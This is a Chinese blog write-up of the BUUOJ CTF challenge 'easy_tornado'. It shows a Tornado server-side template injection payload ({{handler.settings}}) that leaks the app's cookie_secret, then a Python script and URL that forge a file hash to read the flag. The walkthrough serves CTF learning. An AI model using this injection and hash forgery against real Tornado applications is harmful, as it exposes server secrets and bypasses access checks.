buuoj--easy_tornado

最新推荐文章于 2024-04-07 18:42:38 发布
最新推荐文章于 2024-04-07 18:42:38 发布
阅读量339 收藏
点赞数
分类专栏: web 文章标签: buuoj web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43619533/article/details/103434363
版权

buuoj–easy_tornado

打开页面提示三个链接

/flag.txt
/welcome.txt
/hints.txt

查看flag.txt

/flag.txt
flag in /fllllllllllllag

查看welcome.txt

/welcome.txt
render

查看hints.txt

/hints.txt
md5(cookie_secret+md5(filename))

render、tornado都是模板,提示模板注入

这是查看flag.txt的链接

18005c28-1a3a-4ef8-9712-674709a3a6ad.node3.buuoj.cn/file?filename=/flag.txt&filehash=9255e92c383a4dc733893c28493c8b22

将/flag.txt修改为/fllllllllllllag报错:
在这里插入图片描述
出现msg=Error
如果修改为123
在这里插入图片描述
模板注入(https://www.jianshu.com/p/55c75e0f7928)

在tornado模板中,存在一些可以访问的快速对象,例如

 <title>
     {{ escape(handler.settings["cookie"]) }}
 </title>

这两个{{}}和这个字典对象也许大家就看出来了,没错就是这个handler.settings对象,又黑翼天使23的博客园日志可知,

handler 指向RequestHandler

而RequestHandler.settings又指向self.application.settings

所有handler.settings就指向RequestHandler.application.settings了!

大概就是说,这里面就是我们一下环境变量,我们正是从这里获取的cookie_secret

msg={{handler.settings}} 得到cookie_secret在这里插入图片描述

‘cookie_secret’: ‘4dff6cea-5745-4572-bf7f-371994e24436’
按照hint的提示即可
脚本(https://www.cnblogs.com/mke2fs/p/11573786.html):

#!-*-coding:utf-8 -*-
import hashlib
def md5(s):
    md5 = hashlib.md5()
    md5.update(s)
    return md5.hexdigest()
def filehash():
    filename = '/fllllllllllllag'
    cookie_secret = '01d3ae36-9d9e-44f4-b25e-405eda25b369'
    print(md5(cookie_secret + md5(filename)))
if __name__ == '__main__':
    filehash()

结果filehash:166f8acca84fe2652fb4f3ba912fa6b1
payload:
18005c28-1a3a-4ef8-9712-674709a3a6ad.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=166f8acca84fe2652fb4f3ba912fa6b1
回显flag

房東的猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[护网杯 2018]easy_tornado
Yb_140的博客
09-05 1597
即md5('61375ac6-5e1d-4510-a256-12786c3e1f09'+md5('/fllllllllllllag'))得到提示信息,得到cookie_secret:61375ac6-5e1d-4510-a256-12786c3e1f09。猜测这里的filehash就是md5加密得到的,我们需要找到cookie_secret。然后结合md5(cookie_secret+md5(filename)),简单来说就是用来生成模板的东西。,就是一个公式,能输出前端页面的公式。
easy_tornado复现
AsagiRiAsagi的博客
01-03 810
Easy_tornado分析 问题与解答 cookie_secret是什么? 答:根据Tornado官方文档的解释:这是settings中关于认证和安全方面的一个配置参数。 settings又是什么? 答:是一个python字典。通常用作于application的配置项。 application是什么? 答:这个问题会比较难直接回答。这需要先理解一个tornado web应用是如何工作的。 我们先看Tornado官方给的一个Hello World程序的例子: import tornado.iol
easy_tornado
nole_的博客
01-22 251
进入网址,看到一下内容 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mLMHFZFt-1611296176433)(C:\Users\Noel丶\Desktop\论坛\Easy_tornado\image-20210122125417272.png)] 首先,习惯性的访问一下 robots.txt,看一下有没有什么好东西 看来不存在 返回,f12,发现body中的三行文字,并且分别指向三个地址 ,依次打开 首先,很容易的观察到,我们请求的网址都是由filename以及 f
easytornado-攻防世界
最新发布
szhangliwenya的博客
04-07 562
handler指向处理当前这个页面的RequestHandler对象, RequestHandler.setting指向self.application.settings,因此构造payload。tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入。查询到可以使用{{handler.settings}}获取服务器的配置文件信息。代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。
web buuctf [护网杯 2018]easy_tornado1
weixin_44214568的博客
03-12 4440
分解信息量: 1.题目名称是easy-tornado:tornado是python的web框架(web框架的产生是避免程序代码与html编码的编码混乱性,框架将传参过程进行独立) 2.打开一共三个链接,分别点开 /flag.txt 提示内容:flag in /fllllllllllllag ,意思就是flag在文件fllllllllllllag里面,需要考虑怎么进入文件里面 /welcome.txt 提示内容:render,render是tornado里面的渲染函数,就是对web网页界面进行编辑的函
VxWork-And-Tornado.rar_Tornado vxwork_tornado_tornado and vxwork
09-19
Tornado是与VxWorks配套的集成开发环境(IDE),它提供了全面的开发、调试和测试工具,使得开发者能够便捷地进行VxWorks应用程序的编写、构建、调试和维护。Tornado包括项目管理器、源代码编辑器、编译器、链接器、...
VxWorks--tornado.zip_vxworks
09-14
VxWorks 是由美国WRS (风河)公司开发的一个运行在目标机上的高性能、可裁剪的 嵌入式实时操作系统。目前我们使用的Tornado集成开发环境为设计VxWorks应用程序提供 了一套高效、实用的调试手段和方法。
tornado-swagger
04-30
from tornado . web import RequestHandler , HTTPError from tornado_swagger import swagger swagger . docs () # You may decorate your operation with @swagger.operation and use docs to inform information...
VxWorks_7_Third-Party_Software_Support__SR0620.pdf
07-08
wind River Systems 公司提供了多种第三方软件支持,包括 iPerf3、Simics、Tornado 等。这些软件可以帮助开发者更方便地开发和测试基于 VxWorks 7 的系统。 iPerf3 是一个网络性能测试工具,可以用来测试网络带宽、...
Python库 | tornado-6.1b2-cp37-cp37m-macosx_10_9_x86_64.whl
04-04
资源分类:Python库 所属语言:Python 资源全名:tornado-6.1b2-cp37-cp37m-macosx_10_9_x86_64.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
【网络安全 | CTF】攻防世界护网杯 2018 easy_tornado
等风来
07-23 3684
tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。或一个目录是“/Users/python/tornado-file-read/static_private/”,传入某文件的路径为“/Users/python/tornado-file-read/static/”将得到的cookie_secret同加密的内容一同进行加密。
攻防世界easytornado-tornado模板注入
yuanxu8877的博客
11-28 373
攻防世界easytornado-tornado模板注入
20220215-MISC-BUUCTF-easycap--Wireshark跟踪TCP流--隐藏的钥匙(winhex工具的使用)
qq_51550750的博客
02-15 2589
MISC-BUUCTF-easycap 注意:得到的 flag 请包上 flag{} 提交 【1】下载附件,并解压: .pcap文件需要用Wireshark打开 【2】Wireshark打开easycap.pcap文件: 随便某一行,右键,follow-- TCP stream—出现flag: flag{385b87afc8671dee07550290d16a8071} easycap总结 Wireshark右键 跟踪TCP流 MISC-BUUCTF-隐藏的钥匙 路飞一行人千辛万苦来到了
buuoj [ACTF新生赛2020]easyre
f_zhangwuji的博客
10-25 121
upx脱壳后Ida展开如下,从if ( v4[i]!= _data_start [*((char *)v5 + i) - 1] )猜测flag是v5,v4[i]=datastart[j]时,v5=j+1。( *((char *)v5 + i)表示就是v5数组的值 )buuoj [ACTF新生赛2020]easyre。
攻防世界 web进阶区 easytornado
m0_51395584的博客
06-17 420
攻防世界 web进阶区 easytornado Tornado 框架的漏洞利用
buuoj easyre Writeup
m0_73605862的博客
05-18 127
Step1:将程序放在Exeinfo PE下检查程序是否加了壳,上面显示not packed ,所以没有加壳,即程序的入口没有发生改变。Step3:首先查看字符串,在view里面选择open subviews再选择strings,然后出现文本中的字符串。【来源】(buuoj)https://buuoj.cn/challenges#easyre。Step2:因为不用脱壳,所以直接放在逆向工具IDA Pro 下进行查看。【思路】先查壳再使用IDA进行逆向分析。【题型】Reverse。【题目】easyre。
【攻防世界】easytornado
wangzhemvp的博客
04-05 289
可以把它理解为 tornado 模板中内置的环境配置信息名称,通过handler.settings 可以访问到环境配置的一些信息。看到 tornado 模板基本上就用 handler.settings。{{ }}有回显,一般存在模版注入。得到cookie_secret。模版注入 + tornado模板。
【BUUCTF之easy_tornado】
qq_40646572的博客
05-15 894
打开题目网站,发现存在三个文件,都打开看了下,在hint.txt文件中发现提示。 在flag.txt文件中也有提示flag在/fllllllllllllag文件中。 整理下思路,这道题其实关键点在于hint.txt文件中的cookie_secret值。 但考虑到题目名中包含tornado这个关键词,百度下发现这是一个python的web框架,搜索下是否存在可以读取配置文件的漏洞,发现这个框架存在可以读取配置文件的漏洞。 想到还有一个welcome.txt文件,上面提示到render,渲染。想到ss..
if (chg->cc2_detach_wa_active || chg->typec_en_dis_active || chg->try_sink_active) { smblib_dbg(chg, PR_MISC | PR_INTERRUPT, "Ignoring since %s active\n", chg->cc2_detach_wa_active ? "cc2_detach_wa" : "typec_en_dis"); return IRQ_HANDLED; }代码解释
06-07
这段代码主要是用于过滤掉一些不需要处理的 USB Type-C 插拔事件,具体包括以下三种情况: 1. cc2_detach_wa_active:表示正在执行 cc2_detach_wa 操作,即正在处理 USB Type-C CC2 线脱落的情况。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值